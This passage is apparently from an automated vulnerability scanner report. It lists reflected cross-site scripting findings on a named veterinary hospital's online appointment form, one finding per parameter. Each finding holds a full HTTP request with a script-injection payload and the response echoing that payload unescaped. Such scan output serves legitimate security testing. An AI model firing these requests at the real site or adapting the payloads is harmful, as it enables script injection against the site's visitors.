GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=23546"><script>alert(1)</script>3e62334127d&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:57 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=rbfveb3tt0865o46p3m6n44jl1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
pe="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=23546"><script>alert(1)</script>3e62334127d&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&tim
...[SNIP]...

2.99. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a16"><script>alert(1)</script>b7c615c11f4 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=15a16"><script>alert(1)</script>b7c615c11f4&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=e4559his7rbov2pr83025uc590; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="email" id="email" type="text" size="40" maxlength="255" value="15a16"><script>alert(1)</script>b7c615c11f4" />
...[SNIP]...

2.100. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [fname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ff1"><script>alert(1)</script>d1a004b4a7d was submitted in the fname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=21ff1"><script>alert(1)</script>d1a004b4a7d&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t6737mmn0l66ej6a3kul5vm5e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="fname" id="fname" type="text" size="30" class="req" maxlength="50" value="21ff1"><script>alert(1)</script>d1a004b4a7d" />
...[SNIP]...

2.101. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [guid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55bce"><script>alert(1)</script>8c1dce1f08e was submitted in the guid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=55bce"><script>alert(1)</script>8c1dce1f08e&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=r124nb41s1ua1s8prghmllc3s0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
i" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=55bce"><script>alert(1)</script>8c1dce1f08e&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5
...[SNIP]...

2.102. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ipaddress parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa1dd"><script>alert(1)</script>20291fa6c4c was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243fa1dd"><script>alert(1)</script>20291fa6c4c&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=if1brsa07fop60oc6nosjdjeb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243fa1dd"><script>alert(1)</script>20291fa6c4c&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri
...[SNIP]...

2.103. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [lname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f53d0"><script>alert(1)</script>9b9f80a0f40 was submitted in the lname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=f53d0"><script>alert(1)</script>9b9f80a0f40&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:21 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=j4ue3fobud9ifr9lluj5v6krc2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="lname" id="lname" type="text" size="30" class="req" maxlength="50" value="f53d0"><script>alert(1)</script>9b9f80a0f40" />
...[SNIP]...

2.104. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22281"><script>alert(1)</script>d33a2c5892d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?22281"><script>alert(1)</script>d33a2c5892d=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:56 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?22281"><script>alert(1)</script>d33a2c5892d=1" />
...[SNIP]...

2.105. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [optin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e691"><script>alert(1)</script>d26f4a4d140 was submitted in the optin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=9e691"><script>alert(1)</script>d26f4a4d140&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1